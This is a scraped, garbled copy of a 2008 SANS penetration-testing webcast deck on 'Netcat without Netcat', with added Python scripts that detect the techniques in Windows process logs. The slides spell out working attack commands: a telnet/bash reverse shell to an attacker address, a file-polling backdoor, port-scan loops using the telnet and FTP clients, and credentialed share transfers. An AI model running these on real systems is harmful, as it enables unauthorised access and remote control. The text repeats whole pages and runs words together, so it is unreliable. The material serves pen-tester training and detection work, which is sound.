  (Standard Error of the ftp client, which carries the connection result, is appended to ports.txt after each port's "Checking Port" line)
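Either scanner leaves the same trace in process-creation logging (Windows event 4688 or Sysmon Event ID 1): one cmd.exe parent spawning ftp.exe with a -s: script file, or telnet.exe, once per port, plus the WMIC process deletion used on slide 26 to reap hung clients. The script below is an added example for this page, not code from the slides; it runs over constructed log lines in a simplified timestamp|image|command line|parent pid form and reports per-parent bursts and WMIC kills. Map your own log fields onto parse_line().

```python
"""Flag scan-like bursts of ftp.exe / telnet.exe and WMIC process kills in
Windows process-creation logs.

Added example, not from the SANS/Skoudis slides. The scanner loops on the
preceding slides spawn one ftp.exe (driven by a "-s:" script file) or one
telnet.exe per probed port, all children of a single cmd.exe, so dozens of
such spawns per minute from one parent is the signature; the telnet variant
also reaps hung clients with "wmic process ... delete". Log lines here are
constructed in a simplified form: timestamp|image|command line|parent pid.
"""
from collections import defaultdict
from datetime import datetime, timedelta

BURST_WINDOW = timedelta(seconds=60)
BURST_THRESHOLD = 20   # probe spawns per parent per window before we alert


def parse_line(line):
    ts, image, cmdline, ppid = line.strip().split("|", 3)
    return {"ts": datetime.fromisoformat(ts), "image": image.lower(),
            "cmdline": cmdline, "ppid": int(ppid)}


def is_probe(ev):
    """ftp.exe reading a script file, or any telnet.exe, is a probe candidate."""
    if ev["image"] == "ftp.exe":
        return "-s:" in ev["cmdline"].lower()
    return ev["image"] == "telnet.exe"


def busiest_window(times):
    """Largest number of timestamps inside any BURST_WINDOW, and its start."""
    times = sorted(times)
    best, best_start, start = 0, None, 0
    for end in range(len(times)):
        while times[end] - times[start] > BURST_WINDOW:
            start += 1
        if end - start + 1 > best:
            best, best_start = end - start + 1, times[start]
    return best, best_start


def detect(lines):
    events = [parse_line(l) for l in lines if l.strip()]
    findings = []
    # Rule 1: many probe processes from one parent inside the window
    probes = defaultdict(list)
    for ev in events:
        if is_probe(ev):
            probes[(ev["ppid"], ev["image"])].append(ev["ts"])
    for (ppid, image), times in probes.items():
        count, first = busiest_window(times)
        if count >= BURST_THRESHOLD:
            findings.append(f"port-scan loop: {count} x {image} from ppid {ppid} "
                            f"within {BURST_WINDOW.seconds}s starting {first}")
    # Rule 2: WMIC used to kill processes by name (reaping hung telnet clients)
    for ev in events:
        cl = ev["cmdline"].lower()
        if ev["image"] == "wmic.exe" and "process" in cl and "delete" in cl:
            findings.append(f"wmic process delete from ppid {ev['ppid']} "
                            f"at {ev['ts']}: {ev['cmdline']}")
    return findings


# Constructed sample: a 25-port FTP-client scan loop from cmd.exe pid 4100,
# one interactive ftp session, one WMIC kill, and a lone telnet (below threshold).
SAMPLE_LOG = [f"2008-06-04T10:00:{i:02d}|ftp.exe|ftp -s:ftp.txt|4100" for i in range(25)] + [
    "2008-06-04T10:00:30|ftp.exe|ftp files.example.internal|5120",
    '2008-06-04T10:01:05|wmic.exe|wmic process where name="telnet.exe" delete|4300',
    "2008-06-04T10:02:00|telnet.exe|telnet 10.0.0.5 23|5120",
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

The threshold of 20 spawns per minute is a starting point: the FTP variant stalls roughly 30 seconds on each open port, so its rate drops on a host with several listeners, which is why the rule keys on the busiest window rather than the average.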
Slide 31: Windows Command-Line File Transfer
• File transfer on arbitrary ports is hard...
• But we can use Windows file and print sharing on the command line, redirecting to shares:
  – C:\> type [filename] > \\[machine]\[share]\[filename]
• Will use current user credentials...
• Or, if you want different credentials, first do a:
  – C:\> net use \\[machine] [password] /u:[user]
• Can't we just use copy or move? Yes, but relying on redirection (>) of Standard Out is nice here
  – Because we can redirect the output of commands across the network, not just files
Slide 32: File Transfer in Action
[screenshot; no text is recoverable]
Slide 33: Backdoors: The File Shell
• Now, let's do a backdoor
• Listening on a port is hard...
• But we can look in the file system
• A FOR loop can spin looking for a command in a file, run the command, and dump output to another file:
  – C:\> for /L %i in (1,0,2) do (for /f "delims=^" %j in (commands.txt) do cmd.exe /c %j >> output.txt & del commands.txt) & ping -n 2 127.0.0.1
Slide 34: Using the File Shell
• Now, we can feed it commands by echoing them into \\[IP_addr]\[share]\commands.txt
• And we can read results by using type to read \\[IP_addr]\[share]\output.txt
• The file shell is a building block...
  – Other folks are starting to use it, extending the idea
  – Use the FTP client to move commands on arbitrary ports, writing them into the file system
  – Or, rely on nslookup to pull domain names that include commands
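Because cmd.exe has no sleep, the file shell above (and the telnet-killing loop on slide 26) paces itself with ping against 127.0.0.1, so the parent cmd.exe spawns ping.exe at a machine-regular interval for as long as the backdoor runs, and spawns a cmd.exe /c child whenever commands.txt appears. The script below, added for this page and not taken from the slides, measures that regularity per parent (coefficient of variation of the inter-spawn gaps) and correlates it with cmd.exe /c children. Events are constructed in a timestamp|parent pid|image|command line form; adapt parse() to your own process-creation source.

```python
"""Spot a file-shell style poll loop from the regularity of its sleep primitive.

Added example, not from the SANS/Skoudis slides. The loop on slide 33 runs
"ping -n 2 127.0.0.1" every pass (slide 26's kill loop uses "-n 6"), so one
parent cmd.exe spawns ping.exe at a near-constant interval, and spawns
"cmd.exe /c <command>" children when a command file arrives. Events below
are constructed in the form timestamp|parent pid|image|command line.
"""
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

MIN_EVENTS = 10   # samples needed before regularity means anything
MAX_CV = 0.25     # stdev/mean of gaps at or below this is "machine-regular"


def parse(line):
    ts, ppid, image, cmdline = line.strip().split("|", 3)
    return datetime.fromisoformat(ts), int(ppid), image.lower(), cmdline


def regular_ping_loops(lines):
    """Map parent pid -> (count, mean gap in s, cv) for parents that spawn
    ping against 127.0.0.1 at machine-regular intervals."""
    by_parent = defaultdict(list)
    for ts, ppid, image, cmdline in map(parse, filter(str.strip, lines)):
        if image == "ping.exe" and "127.0.0.1" in cmdline:
            by_parent[ppid].append(ts)
    loops = {}
    for ppid, times in by_parent.items():
        if len(times) < MIN_EVENTS:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean > 0 else float("inf")
        if cv <= MAX_CV:
            loops[ppid] = (len(times), round(mean, 2), round(cv, 3))
    return loops


def file_shell_candidates(lines):
    """Parents with a regular ping loop that also run cmd.exe /c children:
    the shape of a file shell executing commands it picked up from a file.
    (The ">> output.txt" redirection is handled by the parent cmd.exe, so it
    does not appear in the child's command line.)"""
    loops = regular_ping_loops(lines)
    hits = {}
    for ts, ppid, image, cmdline in map(parse, filter(str.strip, lines)):
        if ppid in loops and image == "cmd.exe" and "/c" in cmdline.lower():
            hits.setdefault(ppid, []).append(cmdline)
    return hits


# ---- constructed sample events ------------------------------------------
_BASE = datetime(2008, 6, 4, 10, 0, 0)


def _ping_series(ppid, gaps, args):
    t, out = _BASE, []
    for g in [0.0] + gaps:
        t += timedelta(seconds=g)
        out.append(f"{t.isoformat()}|{ppid}|ping.exe|{args}")
    return out


SAMPLE_EVENTS = (
    # pid 4400: 30 pings about 1.05 s apart, i.e. a tight loop using ping as sleep
    _ping_series(4400, [1.0, 1.1] * 14 + [1.0], "ping -n 2 127.0.0.1")
    # pid 5100: 12 pings at human, irregular intervals
    + _ping_series(5100, [1, 30, 2, 45, 3, 60, 1, 20, 5, 90, 4], "ping -n 1 127.0.0.1")
    + [
        "2008-06-04T10:00:05|4400|cmd.exe|cmd.exe /c ipconfig",
        "2008-06-04T10:00:17|4400|cmd.exe|cmd.exe /c whoami",
        "2008-06-04T10:00:40|6000|cmd.exe|cmd.exe /c dir",
    ]
)

if __name__ == "__main__":
    print(regular_ping_loops(SAMPLE_EVENTS))
    print(file_shell_candidates(SAMPLE_EVENTS))
```

A short, jittery series from a person at a console fails the MIN_EVENTS and MAX_CV filters; both thresholds are starting points to tune against your own baseline of scripted ping use.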
Slide 35: The File Shell In Action
[screenshot; no text is recoverable]
Slide 36: Outline
• Building a Penetration Test Infrastructure
• Netcat without Netcat
• Conclusions
• Q&A
Slide 37: Conclusions
• Netcat without Netcat shows that, with only individual command execution on a target machine, an attacker can use built-in tools to wield significant control over the target box
• Defenders need to be able to interpret attackers' actions and anticipate their moves
• Penetration testers need to be able to make the most of built-in tools to operate within the rules of engagement for their projects
• Netcat without Netcat serves these goals
Slide 38: Follow-Up
• SANS Security 560: Network Penetration Testing and Ethical Hacking
• 20% discount if you registered for this webcast
  – Use registration discount code PENTEST20
• Discount applies to 560 course through August:
  – June 4-9, Las Vegas, NV, Skoudis
  – June 12-July 22, Home On-Line, Skoudis
  – July 24-29, Wash DC, Skoudis
  – Aug 11-16, Boston, Shackleford
  – Aug 18-23, Minneapolis, Conrad
  – Aug 24-29, Va Beach, Strand
• Go to www.sans.org and look for "560" for details
Slide 39: Outline
• Why Penetration Testing
• Windows Command Line Tips for Pen Testers
• Conclusions
• Q&A
  – REMEMBER: The third webcast in this series of three will be on August 21, 2008
Page 22
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 22
Linux Command-Line
Backdoor via ldquoReverse Telnetrdquo bull Therersquos a whole different way we can get remote
shell without using devtcpbull Linux telnet clients let us redirect Standard In and
Standard Out
bull Gives rise to ldquoReverse telnetrdquo bull On target machine we could run$ telnet [attacker_IPaddr] [port1] |
binbash | telnet [attacker_IPaddr][port2]
bull Provide commands on attackerrsquos machine via port1
bull Receive output on attackerrsquos machine on port2
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 23
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 23
Reverse Telnet Shell in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 26
Windows Port Scanner Using
Telnet Clientbull We could systematically telnet to port after portndash Cgt for L i in (111024) do telnet [IPaddr] i
bull Problem When it finds an open port it hangsbull How to address
ndash Watch ithellip When it stops hit CTRL-[ and then type quit to resume
ndash Or kill the telnet client every 5 secondsbull Cgt for L i in (102) do wmic process where
name=telnetexe delete amp ping -n 6 127001
ndash Downside Race condition may kill one that hasnrsquot finished checking
M P bl ith Wi d
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 27
More Problems with Windows
Telnet Client as a Port Scannerbull Other problems
ndash Results arenrsquot loggedbull You canrsquot do anything with Standard Out of telnet client
ndash Attempts at redirection either make it hang or not run
bull And the logging option of the Windows telnet client (-l[filename]) overwrites all earlier logshellip No append option
bull So you have to watch it sadly
ndash Most versions of Vista do not include telnetclient by defaultbull But Netcat without Netcat is about living off the land
bull There must be a better way
Wi d P t S U i
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 28
Windows Port Scanner Using
FTP Clientbull Windows FTP client Cgt ftp [IPaddr]
bull Problem Canrsquot specify port to connect to on theinvocation command linehellip only connects to TCP port 21
bull Solution But you can specify dest port in an FTP
command file ndash open [IPaddr] [port]
bull Then the ftp client can read the contents of that file anddo what it says by being invoked withndash Cgt ftp ndashs[filename]
bull Wersquoll write a loop that generates an FTP command fileand invokes FTP to run commands from that file
displaying or storing results at each iteration
Th Wi d C d Li
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 29
The Windows Command Line
Port Scanner Using FTP Clientbull Cgt for L i in (111024) do
echo open [IPaddr] i gt ftptxt ampecho quit gtgt ftptxt amp ftp-sftptxt
bull Problem It hangs for about 30 seconds onopen port then moves on ndash Thatrsquos not so bad
bull Another Problem It doesnrsquot store results ndash We can fix that but it gets a little ugly
Making It Store Results
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3039
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 30
Making It Store Resultsbull Cgt for L i in
(111024) do
echo Checking
Port i gtgt
portstxt amp echoopen [IP_addr] i
gt ftptxt amp echo
quit gtgt ftptxt ampftp -sftptxt
2gtgtportstxt
Windows Command Line File Transfer
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3139
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 31
Windows Command-Line File Transfer
bull File transfer on arbitrary ports is hardbull But we can use Windows file and print sharing on
the command line redirecting to shares
bull Cgt type [filename] gt[machine][share][filename]
bull Will use current user credentialshellip
bull Or if you want different credentials first do andash Cgt net use [machine] [password]u[user]
bull Canrsquot we just use copy or move Yes but relyingon redirection (gt) of Standard Out is nice here ndash Because we can redirect the output of commands
across the network not just files
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3239
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 32
File Transfer in Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3339
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 33
Backdoors The File Shellbull Now letrsquos do a backdoor
bull Listening on a port is hardhellipbull But we can look in the file system
bull A FOR loop can spin looking for a commandin a file run the command and dump outputto another file
bull Cgt for L i in (102) do (forf delims=^ j in (commandstxt)do cmdexe c j gtgt outputtxt ampdel commandstxt) amp ping -n 2127001
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 34
Using the File Shell
bull Now we can feed it commands by echoing theminto [IP_addr][share]commandstxt
bull And we can read results by using type to read[IP_addr][share]outputtxt
bull The file shell is a building blockhellip ndash Other folks are starting to use it extending the idea
ndash Use FTP client to move commands on arbitrary portswriting them into the file system
ndash Or rely on nslookup to pull domain names that includecommands
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 35
The File Shell In Action
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3639
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 36
Outline
bull Building a Penetration TestInfrastructure
bull Netcat without Netcatbull Conclusions
bull QampA
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3739
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 37
Conclusionsbull Netcat without Netcat shows that with only individual
command execution on a target machine an attackercan use built-in tools to wield significant control overthe target box
bull Defenders need to be able to interpret attackersrsquo actions and anticipate their moves
bull Penetration testers need to be able to make the most
of built-in tools to operate within the rules of engagement for their projects
bull Netcat without Netcat serves these goals
Follo Up
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3839
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 38
Follow-Upbull SANS Security 560 Network Penetration Testing
and Ethical Hacking
bull 20 discount if you registered for this webcast ndash Use registration discount code of PENTEST20
bull Discount applies to 560 course through August
ndash June 4-9 Las Vegas NV Skoudis ndash June 12-July 22 Home On-Line Skoudis
ndash July 24-29 Wash DC Skoudis
ndash Aug 11-16 Boston Shackleford ndash Aug 18-23 Minneapolis Conrad
ndash Aug 24-29 Va Beach Strand
bull Go to wwwsansorg and look for ldquo560rdquo for details
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 3939
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 39
Outlinebull Why Penetration Testing
bull Windows Command Line Tips for PenTesters
bull Conclusions
bull QampA
ndash REMEMBER The third webcast in thisseries of three will be on August 21 2008
Page 24
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2439
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 24
Windowsbull Built-in command-line has very clunky syntax
bull Also telnet and ftp clients are absolutelyatrocious
ndash Especially in the way that they (donrsquot) interactwith Standard In and Standard Out
bull Thus we will build Netcat-without-Netcat
from some fundamental command-linebuilding blocks in Windows
8142019 Penetration Testing Ninjitsu2 Infrastructure and Netcat Without Netcat
httpslidepdfcomreaderfullpenetration-testing-ninjitsu2-infrastructure-and-netcat-without-netcat 2539
Network Pen Testing amp Ethical Hacking - copy2008 Ed Skoudis 25
Building Blocks
Windows FOR Loopsbull Iteration can be very helpful
ndash Wersquore not expecting you to be programmers ndash But sometimes yoursquoll want to iterate over a given set of
itemsbull Numbers
bull Lines in a file
bull The Windows command line supports several kinds of FOR loopshellip some of the most useful are ndash FOR L Counter
ndash FOR F Iterate over file contents strings or commandoutput
bull See the first webcast in this series for details on how
these workhellip we wonrsquot go through them again here
Windows Port Scanner Using Telnet Client
• We could systematically telnet to port after port
  – C:\> for /L %i in (1,1,1024) do telnet [IPaddr] %i
• Problem: When it finds an open port, it hangs
• How to address?
  – Watch it… When it stops, hit CTRL-[ and then type quit to resume
  – Or kill the telnet client every 5 seconds
    • C:\> for /L %i in (1,0,2) do wmic process where name="telnet.exe" delete & ping -n 6 127.0.0.1
  – Downside: Race condition may kill one that hasn't finished checking
More Problems with Windows Telnet Client as a Port Scanner
• Other problems:
  – Results aren't logged
    • You can't do anything with Standard Out of the telnet client
      – Attempts at redirection either make it hang or not run
    • And the logging option of the Windows telnet client (-l [filename]) overwrites all earlier logs… No append option
    • So you have to watch it, sadly
  – Most versions of Vista do not include the telnet client by default
    • But Netcat without Netcat is about living off the land
• There must be a better way
Windows Port Scanner Using FTP Client
• Windows FTP client: C:\> ftp [IPaddr]
• Problem: Can't specify the port to connect to on the invocation command line… only connects to TCP port 21
• Solution: But you can specify the destination port in an FTP command file
  – open [IPaddr] [port]
• Then the ftp client can read the contents of that file and do what it says by being invoked with
  – C:\> ftp -s:[filename]
• We'll write a loop that generates an FTP command file and invokes FTP to run commands from that file, displaying or storing results at each iteration
The Windows Command Line Port Scanner Using FTP Client
• C:\> for /L %i in (1,1,1024) do echo open [IPaddr] %i > ftp.txt & echo quit >> ftp.txt & ftp -s:ftp.txt
• Problem: It hangs for about 30 seconds on an open port, then moves on
  – That's not so bad
• Another Problem: It doesn't store results
  – We can fix that, but it gets a little ugly
Making It Store Results
